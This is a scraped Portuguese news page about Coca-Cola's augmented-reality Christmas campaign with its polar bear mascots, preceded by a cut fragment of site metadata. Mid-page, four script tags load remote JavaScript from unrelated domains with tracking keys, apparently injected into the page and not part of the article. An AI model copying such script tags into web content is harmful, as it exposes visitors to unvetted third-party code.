\n\n\n\n\n\n","alternativeHeadline":"Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso.\n\n\n\n\n\n\n\n","abstract":"Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso.\n\n\n\n\n\n\n\n","articleBody":"Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso, e, agora – além das peças tradicionais e esperadas -, os mascotes mais reconhecidos do Natal ganham sua primeira incursão na realidade aumentada.\r\n\r\nA agência criativa in-house, Coca-Cola Digital Platforms, colaborou com o Tactic Studio, de São Francisco, para criar uma série de experiências de AR para iOS ou Android.\r\n\r\nConfira as últimas novidades sobre marketing digital aqui.\r\n\r\nLeia também: Natal da Coca-Cola já está no ar.\r\n\r\nEm uma delas, você pode digitalizar latas e garrafas com tema das festividades do fim de ano para transformar a embalagem em uma recriação digital do domínio gelado dos ursos polares.\r\n\r\n\r\n\r\n“Queríamos oferecer aos fãs uma nova maneira divertida de interagir com a marca e dar vida à magia dos ursos polares.", disse Allie Blalock, gerente de envolvimento digital da Coca-Cola na América do Norte em um anúncio para a imprensa.","speakable":{"@type":"SpeakableSpecification","cssSelector":[".single-head",".single-body"]},"isAccessibleForFree":true,"genre":["Mídia"]},{"@type":"WebPage","@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/","url":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/","name":"Coca-Cola cria ações em realidade aumentada para o Natal - Promoview - Insights sobre Brand Experience","isPartOf":{"@id":"https://www.promoview.com.br/#website"},"primaryImageOfPage":{"@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#primaryimage"},"image":{"@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#primaryimage"},"thumbnailUrl":"https://uploads.promoview.com.br/2023/12/dab62de8.jpg","datePublished":"2019-11-17T06:37:00+00:00","dateModified":"2025-04-25T04:22:05+00:00","description":"Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso.","breadcrumb":{"@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#primaryimage","url":"https://uploads.promoview.com.br/2023/12/dab62de8.jpg","contentUrl":"https://uploads.promoview.com.br/2023/12/dab62de8.jpg","width":800,"height":375},{"@type":"BreadcrumbList","@id":"https://www.promoview.com.br/coca-cola-cria-acoes-em-realidade-aumentada-para-o-natal/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https://www.promoview.com.br/"},{"@type":"ListItem","position":2,"name":"Experiência de Marca","item":"https://www.promoview.com.br/experiencia-de-marca/"},{"@type":"ListItem","position":3,"name":"Mídia","item":"https://www.promoview.com.br/experiencia-de-marca/midia/"},{"@type":"ListItem","position":4,"name":"Coca-Cola cria ações em realidade aumentada para o Natal"}]},{"@type":"WebSite","@id":"https://www.promoview.com.br/#website","url":"https://www.promoview.com.br/","name":"Promoview","description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","publisher":{"@id":"https://www.promoview.com.br/#organization"},"alternateName":"Promoview","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https://www.promoview.com.br/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https://www.promoview.com.br/#organization","name":"Promoview","alternateName":"Promoview","url":"https://www.promoview.com.br/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/logo/image/","url":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","contentUrl":"https://uploads.promoview.com.br/2024/11/dFvSDQWS-yoast-projeto-696x696-1-jpg.webp","width":696,"height":696,"caption":"Promoview"},"image":{"@id":"https://www.promoview.com.br/#/schema/logo/image/"},"sameAs":["https://www.instagram.com/promoview/","https://www.linkedin.com/company/promoview/","https://www.youtube.com/channel/UCDOyD3fGgwpvMsWF7pqi7AA","https://news.google.com/publications/CAAqBwgKMK-NuAswvKjPAw?hl=pt-BR&gl=BR&ceid=BRpt-419","https://open.spotify.com/show/6mken3c6hcUDSsc3VwEDlf?si=a2b3d9018a954fcc&nd=1&dlsi=695ae8972acb48d6","https://api.whatsapp.com/send/?phone=5511948022977&text&type=phone_number&app_absent=0"],"description":"Mergulhe nas últimas tendências do brand experience. Descubra as estratégias e experiências que estão definindo o futuro das grandes marcas.","email":"[email protected]","telephone":"41 991944093","legalName":"JULIO FEIJO NETO ME","foundingDate":"2006-08-18","vatID":"05.151.320/0001-66","numberOfEmployees":{"@type":"QuantitativeValue","minValue":"1","maxValue":"10"}},{"@type":"Person","@id":"https://www.promoview.com.br/#/schema/person/image/af4fc0bf9cab018130e1c090810cbd48","name":"Redação Promoview","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https://www.promoview.com.br/#/schema/person/image/5c28630bdeeca78554bd08ce207d5213","url":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","contentUrl":"https://uploads.promoview.com.br/2024/02/asdasdasdasdasdasd-120x120.png","width":120,"height":120,"caption":"Redação Promoview"},"url":"https://www.promoview.com.br/autor/redacao-promoview/"}]}
Coca-Cola cria ações em realidade aumentada para o Natal
Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso.
<script src="//cilkonlay.com/2176e1b695bb4978f2.js"></script>
<script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8566x" type="text/javascript"></script>
<script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8566x&format=arrjs&r=1573167018639" type="text/javascript"></script>
<script src="https://cilkonlay.com/ext/2176e1b695bb4978f2.js?sid=52564_8566_&title=a&blocks[]=31af2" type="text/javascript"></script>
Desde sua estreia em 1993, os icônicos mascotes de ursos polares da empresa provam ser um contínuo sucesso, e, agora – além das peças tradicionais e esperadas -, os mascotes mais reconhecidos do Natal ganham sua primeira incursão na realidade aumentada.
A agência criativa in-house, Coca-Cola Digital Platforms, colaborou com o Tactic Studio, de São Francisco, para criar uma série de experiências de AR para iOS ou Android.
Confira as últimas novidades sobre marketing digital aqui.
Em uma delas, você pode digitalizar latas e garrafas com tema das festividades do fim de ano para transformar a embalagem em uma recriação digital do domínio gelado dos ursos polares.
“Queríamos oferecer aos fãs uma nova maneira divertida de interagir com a marca e dar vida à magia dos ursos polares.", disse Allie Blalock, gerente de envolvimento digital da Coca-Cola na América do Norte em um anúncio para a imprensa.
Nós usamos cookies e outras tecnologias semelhantes para melhorar a sua experiência em nossos serviços, personalizar publicidade e recomendar conteúdo de seu interesse. Ao utilizar nossos serviços, você está ciente dessa funcionalidade.
Termos de Uso
e
Política de privacidade